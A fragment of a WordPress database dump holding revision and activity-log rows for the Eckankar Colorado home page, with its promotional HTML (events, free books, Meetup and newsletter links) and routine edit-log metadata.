font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237083,40288,'post_id','7160'),(237084,40288,'post_type','page'),(237085,40288,'post_title','Home'),(237086,40288,'post_prev_post_content','<div style=\"height: 150px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\" ><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237082,40287,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(237081,40287,'_server_remote_addr','76.130.120.x'),(237080,40287,'_user_email','nada@zipnadanot.org'),(237078,40287,'_user_id','2'),(237079,40287,'_user_login','S8zhaBda'),(237077,40287,'_message_key','post_updated'),(237076,40287,'post_title','Home'),(237059,40285,'_message_key','post_updated'),(237060,40285,'_user_id','2'),(237061,40285,'_user_login','S8zhaBda'),(237062,40285,'_user_email','nada@zipnadanot.org'),(237063,40285,'_server_remote_addr','76.130.120.x'),(237064,40285,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(237065,40286,'post_id','7160'),(237066,40286,'post_type','page'),(237067,40286,'post_title','Home'),(237068,40286,'_message_key','post_updated'),(237069,40286,'_user_id','2'),(237070,40286,'_user_login','S8zhaBda'),(237071,40286,'_user_email','nada@zipnadanot.org'),(237072,40286,'_server_remote_addr','76.130.120.x'),(237073,40286,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(237074,40287,'post_id','7160'),(237075,40287,'post_type','page'),(237058,40285,'post_new_post_content','<div style=\"height: 150px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\" ><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" 